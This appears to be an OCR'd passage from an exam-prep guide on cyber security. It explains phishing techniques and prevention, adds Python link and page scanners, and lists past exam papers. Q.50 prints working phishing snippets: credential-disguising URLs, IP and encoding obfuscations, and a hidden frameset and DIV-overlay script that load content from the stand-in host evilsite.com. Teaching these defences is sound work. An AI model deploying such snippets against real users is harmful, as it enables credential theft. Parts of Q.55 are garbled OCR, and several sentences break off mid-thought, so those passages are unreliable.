(ii) Forwarding — Forwarding is seen more with Amazon, eBay, and PayPal. It is an e-mail you typically receive that has all the usual real Web site images and logins within it. When a victim logs in via a Forwarding site, the user's data is sent to the hostile server, then the user is forwarded to the real site, and in many cases, the system logs you into the real site via a man-in-the-middle (MITM) technique. This Forwarding attack continuity is seamless and victims usually never know that they were phished. The drawback to this approach is that it relies on the spam itself to get through without being filtered. Due to the amount of HTML within such an e-mail, many advanced antivirus and antispam filters will block it because the Bayesian scores rise with more encapsulated HTML.

(iii) Popups — The third basic method is the popup attack, a very creative but limited approach. The popup technique was first discovered during the barrage of phishing attacks on Citibank in September … It involved a link that you clicked within your e-mail, and it posted a hostile popup; behind the popup was the actual target that the attackers wanted to steal data from. This is quite a slick, creative ploy that is actually … of the three basic phishing methods. However, popup attacks are less common today, since most browsers now have popup blockers installed by default (Mozilla/FireFox and Service Pack 2 for XP).


Q.50. Explain the different types of phishing. (R.GP.V., Nov. 2018)

Ans. Numerous different types of phishing attacks have now been identified. Some of the more prevalent are listed below —

(i) Man-in-the-Middle Phishing — It is harder to detect than many other forms of phishing. In these attacks hackers position themselves between the user and the legitimate Website or system. They record the information being entered but continue to pass it on so that users' transactions are not affected. Later they can sell or use the information or credentials collected when the user is not active on the system.
(ii) URL Obfuscation Attacks — The secret for many phishing attacks is to get the message recipient to follow a hyperlink (URL) to the attacker's server, without them realising that they have been duped. Unfortunately phishers have access to an increasingly large arsenal of methods for obfuscating the final destination of the customer's web request. The most common methods of URL obfuscation are —

(a) Bad Domain Names — One of the most trivial obfuscation methods is through the purposeful registration and use of bad domain names. Consider the financial institute MyBank with the registered domain mybank.com and the associated customer transactional site http://privatebanking.mybank.com. The phisher could set up a server using any of the following names to help obfuscate the real destination host —

(1) http://privatebanking.mybank.com.ch

(2) http://mybank.privatebanking.com

(3) http://privatebanking.mybonk.com or even http://privatebanking.mybank.c…

(4) http://privatebanking.mybank.hackproof.com

It is important to note that as domain registration organisations internationalize their services, it is possible to register domains in other languages and their specific character sets. For example, the Cyrillic "o" looks identical to the standard ASCII "o" but can be used for different domain registration purposes, as pointed out by a company who registered microsoft.com in Russia a few years ago. Finally, it is worth noting that even the standard ASCII character set allows for ambiguities such as upper-case "i" and lower-case "L".

(b) Friendly Login URLs — Many common Web browsers support URLs that can include authentication information such as a login name and password. In general the format is URL://username:password@hostname/path. Phishers may substitute the username and password fields for details associated with the target organization. For example, the following URL sets the username = mybank.com, password = ebanking and the destination hostname is evilsite.com —

http://mybank.com:ebanking@evilsite.com/phishing/fakepage.htm

This friendly login URL can successfully trick many customers into thinking that they are actually visiting the legitimate MyBank page. Because of its success, many current browser versions have dropped support for this URL encoding method.

(c) Third-party Shortened URLs — Due to the length and complexity of many Web based application URLs, combined with the way URLs may be represented and displayed within various e-mail systems (e.g., extra spaces and line feeds inserted into the URL), third-party organizations have sprung up offering free services designed to provide shorter URLs. Through a combination of social engineering and deliberately broken long URLs, phishers may use these free services to obfuscate the true destination. Common free services include http://smallurl.com and http://tinyurl.com.
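An added Python example, not from the book, of the checks a mail gateway or browser extension would run against a link to detect the tricks described in this section: bad domain names that merely contain the brand, the friendly-login userinfo trick, and the alternate IP notations (dword, octal, hexadecimal, mixed) used in host name obfuscation, which are decoded back to dotted-decimal. The expected domain mybank.com is taken from the text; the rule that the registered domain is the last two labels (no public-suffix list) is an assumption of the example.

```python
"""Link analysis for the URL obfuscation tricks in this section (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit


def decode_ip_host(host):
    """Dotted-decimal form of an IP literal written in any alternate notation
    (dword, octal, hex, or a mix), or None if host is not an IP literal.

    Follows the classic inet_aton rules: each dot-separated part is decimal,
    0-prefixed octal or 0x-prefixed hex, and with fewer than four parts the
    last one fills the remaining bytes (so a single number is a dword).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]+", part):
            values.append(int(part, 8))
        elif re.fullmatch(r"[0-9]+", part):
            values.append(int(part, 10))
        else:
            return None
    number = 0
    for value in values[:-1]:
        if value > 255:
            return None
        number = (number << 8) | value
    remaining = 4 - (len(values) - 1)          # bytes covered by the last part
    if values[-1] >= 1 << (8 * remaining):
        return None
    number = (number << (8 * remaining)) | values[-1]
    return str(ipaddress.IPv4Address(number))


def registered_domain(host):
    # Assumption of this example: the registered domain is the last two labels.
    return ".".join(host.split(".")[-2:])


def analyse_url(url, expected_domain):
    """List the reasons a link does not plainly belong to expected_domain."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        # text before '@' is userinfo, not the host: the friendly-login trick
        findings.append("userinfo before '@': %r is not the host" % parts.username)
    if not host.isascii():
        findings.append("non-ASCII characters in host (possible homograph)")
    dotted = decode_ip_host(host)
    if dotted is not None:
        findings.append("IP-literal host %s -> %s" % (host, dotted))
        if host != dotted:
            findings.append("non-dotted-decimal IP notation")
        return findings
    domain = registered_domain(host)
    if domain != expected_domain:
        brand = expected_domain.split(".")[0]
        if brand in host:
            findings.append("lookalike: host contains %r but registered domain is %r"
                            % (brand, domain))
        else:
            findings.append("registered domain %r is not %r" % (domain, expected_domain))
    return findings


if __name__ == "__main__":
    for link in ("http://privatebanking.mybank.com/",
                 "http://privatebanking.mybank.com.ch/",
                 "http://mybank.com:ebanking@evilsite.com/phishing/fakepage.htm",
                 "http://0322.0x86.161.0043/"):
        print(link, "->", analyse_url(link, "mybank.com") or "ok")
```

Reporting the decoded dotted-decimal address is what lets a reviewer or a block-list compare it with known bad hosts; the upper-case "i" versus lower-case "L" ambiguity from the text is visual only and cannot be detected by string checks, so it is not attempted here.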


(d) Host Name Obfuscation — Most Internet users are familiar with navigating to sites and services using a fully qualified domain name, such as www.evilsite.com. For a Web browser to communicate over the Internet, this address must be resolved to an IP address, such as 209.134.161.35 for www.evilsite.com. This resolution of IP address to host name is achieved through domain name servers. A phisher may wish to use the IP address as part of a URL to obfuscate the host and possibly bypass content filtering systems, or hide the destination from the end user. For example, the host in the following URL —

http://mybank.com:ebanking@evilsite.com/phishing/fakepage.htm

could be replaced by its IP address. Depending on the application interpreting an IP address, it may be possible to represent it in the following formats —

(1) Octal — address expressed in base 8

(2) Hexadecimal — address expressed in base 16.

These alternative formats are best explained using an example. Consider the URL http://www.evilsite.com/, resolving to 210.134.161.35. This can be interpreted as —

(1) Decimal — http://210.134.161.35/

(2) Dword — http://3532038435/

(3) Octal — http://0322.0206.0241.0043/

(4) Hexadecimal — http://0xD2.0x86.0xA1.0x23/ or even http://0xD286A123/

(5) In some cases, it may be possible to mix formats (e.g., http://0322.0x86.161.0043/)

(e) URL Obfuscation — To ensure support for local languages in Internet software such as Web browsers and e-mail clients, most software will support alternate encoding systems for data. It is a trivial exercise for a phisher to obfuscate the true nature of a supplied URL using one (or a mix) of these encoding schemes. These encoding schemes tend to be supported by most Web browsers and can be interpreted in different ways by Web servers and their custom applications. Typical encoding schemes are —

(1) Escape Encoding — Escape encoding, sometimes referred to as percent-encoding, is the accepted method of representing characters within a URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. This triplet sequence consists of the percent character "%" followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a space with octet code 32, or hexadecimal 20. Thus its URL-encoded representation is %20.

(2) Unicode Encoding — Unicode encoding is a method of referencing and storing characters with multiple bytes by providing a unique reference number for every character no matter what the language or platform. It is designed to allow a Universal Character Set (UCS) to encompass most of the world's writing systems. Many modern communication standards (such as XML, Java, LDAP, JavaScript, WML, etc.), operating systems and Web clients/servers use Unicode character values. Unicode is a 16-bit character encoding that contains all of the characters (2^16 = 65,536 different characters) in common use in the world's major languages. Microsoft Windows platforms allow for encoding of Unicode characters in the following format — %u0000 — for example %u0020 represents a space, while %u01FC represents the accented AE and %uFD3F is an ornate right parenthesis.

(3) Inappropriate UTF-8 Encoding — One of the most commonly utilised formats, Unicode UTF-8 has the characteristic of preserving the full US-ASCII character range. This great flexibility will provide many opportunities for disguising standard characters in longer escape-encoded sequences. For example, the full stop character "." may be represented as %2E, or %C0%AE, or %E0%80%AE, or %F0%80%80%AE, or %F8%80%80%80%AE, or even %FC%80%80%80%80%AE.

(4) Multiple Encoding — … because a Web server or application may not carefully explain the data decoding process, many applications may decode the encoded data multiple times. Consequently, phishers … by double encoding characters … the back-slash "\" …
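The three decoding problems just listed (percent-encoding, the Windows %uXXXX form, overlong UTF-8 sequences and multiple encoding) in one normaliser, as an added Python example that is not from the book. It decodes until the string stops changing, counts how many rounds changed it (more than one means the input was multiply encoded), and counts overlong sequences by decoding UTF-8 the permissive way a lax parser would, so that %C0%AE is recognised as a disguised full stop. The sample URLs are constructed from the encodings in the text; the round limit is an assumption.

```python
"""Decode-until-stable URL normalisation with overlong-UTF-8 and %uXXXX
handling (added example). The sample inputs are constructed from the
encodings listed in this section."""
import re
from urllib.parse import unquote_to_bytes

_MS_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")
# smallest code point a well-formed sequence of each length may encode
_MIN_VALUE = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}


def decode_permissive_utf8(data):
    """Decode bytes the way a lax parser would: accept 2- to 6-byte forms and
    do not reject overlong sequences. Returns (text, overlong_count)."""
    out = []
    overlong = 0
    i = 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            out.append(chr(lead))
            i += 1
            continue
        if 0xC0 <= lead < 0xE0:
            length = 2
        elif 0xE0 <= lead < 0xF0:
            length = 3
        elif 0xF0 <= lead < 0xF8:
            length = 4
        elif 0xF8 <= lead < 0xFC:
            length = 5
        elif 0xFC <= lead < 0xFE:
            length = 6
        else:                       # stray continuation byte or 0xFE/0xFF
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + length]
        if len(tail) != length - 1 or any(not 0x80 <= b < 0xC0 for b in tail):
            out.append("\ufffd")    # truncated or malformed sequence
            i += 1
            continue
        value = lead & (0xFF >> (length + 1))
        for b in tail:
            value = (value << 6) | (b & 0x3F)
        if value < _MIN_VALUE[length]:
            overlong += 1           # e.g. %C0%AE decoding to "."
        out.append(chr(value) if value <= 0x10FFFF else "\ufffd")
        i += length
    return "".join(out), overlong


def normalize_url(url, max_rounds=5):
    """Repeatedly decode %XX and %uXXXX until the string stops changing.

    Returns the final text, how many decode rounds changed it (more than
    one means multiple encoding) and how many overlong UTF-8 sequences
    were seen on the way, plus a list of flags summarising the findings.
    """
    current = url
    rounds = 0
    overlong_total = 0
    while rounds < max_rounds:
        step = _MS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), current)
        raw = unquote_to_bytes(step.encode("utf-8", "replace"))
        decoded, overlong = decode_permissive_utf8(raw)
        overlong_total += overlong
        if decoded == current:
            break
        current = decoded
        rounds += 1
    flags = []
    if rounds > 1:
        flags.append("multiple-encoding")
    if overlong_total:
        flags.append("overlong-utf8")
    if _MS_UNICODE.search(url):
        flags.append("ms-unicode-escape")
    return {"decoded": current, "rounds": rounds,
            "overlong": overlong_total, "flags": flags}


if __name__ == "__main__":
    for sample in ("http://www%C0%AEevilsite%E0%80%AEcom/", "%255C", "%u0020x"):
        print(sample, "->", normalize_url(sample))
```

A filter that compares a link against a block-list should compare the decoded form; a filter that only looks at the raw string sees neither the dots hidden in %C0%AE nor the second layer of a %255C.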


(iii) Hidden Attacks —

(a) Hidden Frames — Frames are a popular method of hiding attack content due to their uniform browser support and easy coding style. In the following example two frames are defined: the first contains the legitimate site, while the second, which occupies no visible part of the browser window, references the phisher's chosen content. The hidden frame may be used to deliver additional content or something more nefarious, such as executing screen-grabbing and key-logging observation code.

    <frameset rows="100%,*" framespacing="0">
      <frame name="real" src="http://mybank.com/" scrolling="auto">
      <frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto">
    </frameset>

(b) Overriding the Page Content — Several methods exist for overriding page content. One of the most popular methods of overriding page content is to use the DHTML function DIV. The DIV function allows an attacker to place content into a "virtual container" that, when given an absolute position and size through the STYLE method, can be used to hide or replace (by "sitting on top") underlying content. This malicious content may be delivered as a very long URL or by referencing a stored malicious script. For example, the following code segment contains the first three lines of a stored JavaScript file (e.g., fake.js) for overwriting a page's content —

    var d = document;
    d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"><TABLE width=500 height=1000 cellspacing=0 cellpadding=1><TR>');
    d.write('<TD bgcolor=#FFFFFF valign=top height=125>');

This method allows an attacker to build a complete page (including graphics and scripting code elements) on top of the real page.
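The two techniques above seen from the detection side, as an added Python example that is not from the book: a small HTML scanner, built on the standard library parser, that reports framesets which leave a frame no visible space, frames and scripts loaded from a host other than the page's own, and absolutely positioned containers with a z-index, the overlay pattern of the DIV trick. The sample page is constructed from the two snippets in the text; the page host mybank.com is taken from them.

```python
"""Scanner for the hidden-frame and DIV-overlay techniques above (added example).
The sample page is constructed from the two snippets in the text."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_PAGE = """
<frameset rows="100%,*" framespacing="0">
<frame name="real" src="http://mybank.com/" scrolling="auto">
<frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto">
</frameset>
<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">
<script src="http://evilsite.com/fake.js"></script>
"""


class HiddenContentScanner(HTMLParser):
    """Collects findings: framesets that squeeze a frame to zero size,
    frames/scripts loaded from a host other than the page's own, and
    absolutely positioned containers with a z-index (overlay candidates)."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # parser lowercases tag and attribute names
        if tag == "frameset":
            for key in ("rows", "cols"):
                sizes = [s.strip() for s in a.get(key, "").split(",") if s.strip()]
                # one frame taking 100% leaves every other frame in the set invisible
                if len(sizes) > 1 and "100%" in sizes:
                    self.findings.append(
                        "frameset %s=%r leaves the other frame(s) no visible space"
                        % (key, a[key]))
        if tag in ("frame", "iframe", "script") and a.get("src"):
            host = (urlsplit(a["src"]).hostname or "").lower()
            if host and host != self.page_host:
                self.findings.append(
                    "<%s> loads %s from foreign host %s" % (tag, a["src"], host))
        style = a.get("style", "").replace(" ", "").lower()
        if "position:absolute" in style and "z-index:" in style:
            self.findings.append(
                "<%s id=%r> is an absolutely positioned overlay (z-index set)"
                % (tag, a.get("id", "")))


def scan_page(html, page_host):
    """Return the list of findings for one page body."""
    scanner = HiddenContentScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "mybank.com"):
        print(finding)
```

Each of these patterns also has legitimate uses (overlays for menus, scripts from a CDN), so the scanner is a triage aid that lists what to look at rather than a verdict; the foreign-host check is the one that most often separates the phishing page from the real one.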
(c) Graphical Substitution — While it is possible to overwrite page content easily through multiple methods, one problem facing phishers is the browser specific visual clues to the source of an attack. These clues include the URL presented within the browser's URL field, the secure padlock representing an HTTPS encrypted connection, and the Zone of the page source. A common method used to overcome these visual clues is through the use of browser scripting languages (such as JavaScript, VBScript and Java) to position specially created graphics over these key areas with fake information.


(iv) Client-side Vulnerabilities — The sophisticated browsers customers use to surf the web, just like any other commercial piece of software, are often vulnerable to a myriad of attacks. The more functionality built into the browser, the more likely there exists a vulnerability that could be exploited by an attacker to gain access to, or otherwise observe, confidential information of the customer.

While software vendors have made great strides in methods of rolling out software updates and patches, home users are notoriously poor in applying them. This, combined with the ability to install add-ons (such as RealPlayer and other embedded applications), means that there are many opportunities for attack.

Similar to the threat posed by some of the nastier automated worms, these vulnerabilities can be exploited in a number of ways. But unlike worms and viruses, many of the attacks cannot be stopped by anti-virus software, as they are often much harder to detect and consequently prevent (i.e., the stage in which the antivirus software gets triggered is usually after the exploitation, and typically only if the attacker tries to install a well known Backdoor Trojan or Key-logger utility).


(v) Deceptive Phishing — The term "phishing" originally referred to account theft using instant messaging, but the most common broadcast method today is a deceptive e-mail message. Messages about the need to verify account information, system failure requiring users to re-enter their information, undesirable account changes, new free services requiring quick action, and … scams are broadcast to a wide group of recipients with the hope that the unwary will respond by clicking a link to, or signing on to, a bogus site where their confidential information can be collected.

(vi) Malware-based Phishing — It refers to scams that involve running malicious software on users' PCs. Malware can be introduced as an e-mail attachment, as a downloadable file from a Web site, or by exploiting known security vulnerabilities, a particular issue for small and medium businesses (SMBs) who are not always able to keep their software applications up to date.

(vii) DNS-Based Phishing ("Pharming") — Pharming is the term given to hosts file modification or Domain Name System (DNS)-based phishing. With a pharming scheme, hackers tamper with a company's hosts files or domain name system so that requests for URLs or name service return a bogus address and subsequent communications are directed to a fake site. The result: users are unaware that the Website where they are entering confidential information is controlled by hackers and is probably not even in the same country as the legitimate Website.


(viii) Content-Injection Phishing — It describes the situation Where 
hackers replace part of the content of a legitimate Site with false Content 
designed to mislead or misdirect the user into giving up their confidential 
information to the hacker. For example, hackers may insert malicious code to 
log user’s credentials or an overlay which can secretly collect information and 
deliver it to the hacker’s phishing server. 


(ix) Search Engine Phishing — It occurs when phishers create Web sites with attractive (often too attractive) sounding offers and have them indexed legitimately with search engines. Users find the sites in the normal course of searching for products or services and are fooled into giving up their information. For example, scammers have set up false banking sites offering lower credit costs or better interest rates than other banks. Victims who use these sites to save or make more from interest charges are encouraged to transfer existing accounts and deceived into giving up their details.


Q.51. Write short note on Man-in-the-middle attack. (R.GP.V., Dec. 2010, June 2011)

Ans. Refer to Q.50 (i).

Q.52. Write short note on deceptive phishing. (R.GP.V., Dec. 2010, June 2011)

Ans. Refer to Q.50 (v).
Q.53. Explain Man-in-middle, phishing and ransomware attacks. (R.GP.V., Dec. 2017)

Ans. Phishing — Refer to Q.48.

Man-in-middle — Refer to Q.50 (i).

Ransomware — Ransomware is a type of malware. The developer of ransomware encrypts some important files and then blackmails the owner of the files to unblock them. Wannacry is an example of ransomware which infected … and immediately spread via its network. Ransomware generally … PDF files, Word documents and other files which are sent through e-mails or through an infected PC.

Q.54. What is phishing? Explain DNS-based Phishing. (R.GP.V., …)

Ans. Refer to Q.48 and Q.50 (vii).


Q.55. What can you do to avoid phishing attacks?

Or

Write about offering phishing prevention techniques. (R.GP.V., June 2016)

Ans. The good news is there are things you can do to steer clear of phishing attacks and phishing sites —

(i) Be Careful about Responding to e-mails that ask you for Sensitive Information — You should be wary of clicking on links in e-mails or responding to e-mails that are asking for things like account numbers, user names and passwords, or other personal information such as social security numbers. Most legitimate businesses will never ask for this information via e-mail. Google does not.


(ii) Go to the Site Yourself, Rather than Clicking on Links in 
Suspicious e-mails — If you receive a communication asking for sensitive 
information but think it could be legitimate, open a new browser window and 
go to the organization's Website as you normally would (for instance, by 
using a bookmark or by typing out the address of the organization's Website). 
This will improve the chances that you are dealing with the organization's 
Website rather than with a phisher's Website, and if there's actually something 
you need to do, there will usually be a notification on the site. Also, if you're not sure about a request you have received, do not be afraid to contact the organization directly to ask. It takes just a few minutes to go to the organization's Website, find an e-mail address or phone number for customer support, and reach out to confirm whether the request is legitimate.

(iii) If You are on a Site that’s Asking you to Enter Sensitive 
Information, Check for Signs of anything Suspicious — If you are on a site 
that’s asking for sensitive information — no matter how you got there — check 
for the signs that it's really the official Website for the organization. For example, 
check the URL to make sure the page is actually part of the organization’s 
Website, and nota fraudulent page on a different domain (such as mybankk.com 
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" vou re on a page that should be secured (like one agp; 
" qase ih eredi ed cuoc look for "https" at the beginn È 
d pend and the padlock icon in the browser. (In Firefox and inteme, | 
alone 6, the padlock appears in the bottom Pme Corner, While in | 
Internet Explorer 7 the padlock appears on the right- p side of the Address | 
bar.) These signs are not infallible, but they are a goo P ace to start. 
(iv) Be Wary of the “Fabulous Offers” and Fantastic Prizes” that x 
You will Sometimes come Across on the Web -If something seems too good tg — 
be true, it probably is, and it could be a phisher trying to steal your information, 
Whenever you come across an offer online that requires you to share personal or | 
other sensitive information to take advantage of it, be sure to ask lots of questions 
and check the site asking for your information for signs of anything Suspicious 
(v) Use of Browser that has a Phishing Filter — The latest Versions 
of most browsers include phishing filters that can help you spot Potentia] | 
phishing attacks. 
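The URL checks in point (iii) above can be applied mechanically. The following is an added example, not part of the book's answer, showing a small link checker that flags a non-https page, a look-alike host such as mybankk.com, a host that merely starts with the trusted name (mybank.com.evil.test), and a user-info trick (mybank.com@evil.test). The trusted-domain list and the sample URLs are constructed for the example and do not refer to real organizations.

```python
"""Added example: a phishing-link checker that applies the advice of Q.55 (iii).

It answers two questions about a URL a user is about to trust: is the page
served over https, and does the host really belong to one of the
organization's own domains (as the user knows them from a bookmark) rather
than to a look-alike or attacker-controlled domain?"""
from urllib.parse import urlsplit

# Constructed allow-list standing in for the user's own bookmarks.
TRUSTED_DOMAINS = {"mybank.com", "example-shop.org"}


def host_belongs_to(host: str, domain: str) -> bool:
    """True only if host is `domain` itself or a subdomain of it.

    The registrable domain is the *end* of a hostname, so
    'login.mybank.com' matches 'mybank.com' but 'mybank.com.evil.test'
    does not, even though it starts with the trusted name."""
    return host == domain or host.endswith("." + domain)


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot near-miss spellings like mybankk.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_link(url: str, trusted=TRUSTED_DOMAINS) -> list:
    """Return a list of warning strings for `url`; an empty list means no sign found."""
    warnings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")

    # Sensitive pages should be served over https (the "padlock" check).
    if parts.scheme.lower() != "https":
        warnings.append("not https: credentials would travel in clear text")
    if not host:
        warnings.append("no hostname in URL")
        return warnings
    # "user@host" in the authority part shows a fake name before the real host.
    if "@" in parts.netloc:
        warnings.append("userinfo before '@' can disguise the real host")
    # Punycode hosts may render as look-alike Unicode characters.
    if host.startswith("xn--") or ".xn--" in host:
        warnings.append("internationalized (punycode) hostname; check for look-alike characters")

    if not any(host_belongs_to(host, d) for d in trusted):
        near = [d for d in trusted if d in host or _edit_distance(host, d) <= 2]
        if near:
            warnings.append(f"host {host!r} is not {near[0]!r} but looks like it")
        else:
            warnings.append(f"host {host!r} is not a known organization domain")
    return warnings


if __name__ == "__main__":
    # Constructed sample links a user might receive by e-mail.
    for sample in ("https://login.mybank.com/account",
                   "https://mybankk.com/login",
                   "http://mybank.com/login",
                   "https://mybank.com.evil.test/login",
                   "https://mybank.com@evil.test/"):
        print(sample, "->", check_link(sample) or "looks consistent with a trusted domain")
```

The suffix test in `host_belongs_to` is the important design choice: matching on "starts with mybank.com" or "contains mybank.com" would accept mybank.com.evil.test, which is exactly the kind of page point (iii) warns about. The edit-distance check is only a hint for the user; a genuinely new domain that is neither trusted nor similar is still reported, just with a less specific message.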

Q.56. What are security threats ? (R.G.P.V., Nov. 2019)

Ans. Within the framework of cyber security, the term threat refers to the potential dangers that can harm the files within your systems, operations or your networks. As businesses are depending on the digital more heavily each day, the types and scope of cyber security threats constantly change and evolve. There are several major categories of cyber security threats such as ransomware, malware, social engineering and phishing.

(i) Ransomware is a type of malware that involves an attacker locking the victim's computer system files, typically through encryption, and demanding a payment to decrypt and unlock them.

(ii) Malware is any file or program used to harm a computer user, such as worms, computer viruses, Trojan horses and spyware.

Fig. 5.7 Cybersecurity Threats

(iii) Social engineering is an attack that relies on human interaction to trick users into breaking security procedures in order to gain sensitive information that is typically protected.

(iv) Phishing is a form of fraud where fraudulent e-mails are sent that resemble e-mails from reputable sources; however, the intention of these e-mails is to steal sensitive data, such as credit card or login information.
CS-5005 (2) (CBGS)
B.E. (Fifth Semester) EXAMINATION, Nov. 2018
Choice Based Grading System (CBGS)
CYBER SECURITY

Note- (i) Attempt any five questions.
(ii) All questions carry equal marks.

1. (a) Define the term cyber crime. Give the classification of cyber crime. (See Unit-I, Page 4, Q.3)
(b) What can a person do to protect himself/herself from identity theft ? (See Unit-II, Page 34, Q.24)
2. (a) What are the problems that may be generated due to session hijacking ?
(b) Define the term cyber stalking. How can we tackle this cyber crime ? (See Unit-I, Page 9, Q.9)
3. (a) How can we check the validity of digital evidence ? (See Unit-IV, Page 85, Q.22)
(b) What is the Salami attack ? How can information be gathered through the Salami technique ? (See Unit-I, Page 11, Q.12)
4. (a) Explain the different types of phishing. (See Unit-V, Page 119, Q.50)
(b) What is the role of digital signature in digital evidence ? (See Unit-IV, Page 85, Q.21)
5. (a) How can DoS and DDoS attacks be performed ? (See Unit-V, Page 112, Q.41)
(b) What is IT Act 2000 ? Write the salient features of IT Act 2000. (See Unit-III, Page 50, Q.2)
6. (a) What is a computer virus ? How does the virus spread ? How to protect against virus ? (See Unit-V, Page 97, Q.19)
(b) How do Trojan horses affect the computer system/network ? (See Unit-V, Page 103, Q.27)
7. (a) What are anonymizers ? How do anonymizers work ? (See Unit-V, Page 88, Q.2)
(b) What is cyber terrorism ? Discuss in detail. (See Unit-II, Page 39, Q.28)
8. Write short notes on —
(a) E-mail spoofing (See Unit-I, Page 6, Q.5)
(b) Software piracy (See Unit-II, Page 19, Q.4)
(c) Password sniffing (See Unit-II, Page 31, Q.21)
(d) Key loggers (See Unit-V, Page 89, Q.5)
CS-503 (C) (CBGS)
B. Tech (Fifth Semester) EXAMINATION, Nov. 2019
Choice Based Grading System (CBGS)
CYBER SECURITY

Note- (i) Attempt any five questions.
(ii) All questions carry equal marks.
(iii) All parts of each question are to be attempted at one place.

1. (a) What do you mean by IP spoofing ? (See Unit-I, Page 6, Q.8) 7
(b) What is a computer virus ? How does the virus spread ? (See Unit-V, Page 94, Q.11) 7
2. (a) Discuss the components of digital signature. (See Unit-IV, Page 75, Q.11) 7
(b) Explain intellectual property right with suitable example. (See Unit-III, Page 64, Q.20) 7
3. (a) How can we check the validity of digital evidence ? (See Unit-IV, Page 85, Q.22) 7
(b) Define the term cyber stalking. How can we tackle this cyber crime ? (See Unit-I, Page 9, Q.9) 7
4. (a) What do you mean by session hijacking ? (See Unit-II, Page 46, Q.36) 7
(b) What are the various challenges of cyber crime ? (See Unit-I, Page 4, Q.2) 7
5. (a) What are security threats ? (See Unit-V, Page 126, Q.56) 7
(b) Explain the term phishing in detail. (See Unit-V, Page 118, Q.48) 7
6. (a) Explain the term copyright act and patent law. (See Unit-III, Page 65, Q.21) 7
(b) Discuss the concept of intrusion detection system. (See Unit-II, Page 21, Q.9) 7
7. (a) What do you mean by software piracy ? (See Unit-II, Page 19, Q.4) 7
(b) Why do we need cyber security ? Explain. (See Unit-III, Page 52, Q.5) 7
8. Write down short notes on any three — 14
(a) Backdoor (See Unit-V, Page 106, Q.31)
(b) Logic bomb (See Unit-V, Page 107, Q.32)
(c) Worm (See Unit-V, Page 98, Q.20)
(d) Spyware (See Unit-V, Page 90, Q.
(e) Firewalls (See Unit-V, Page 107, Q.33)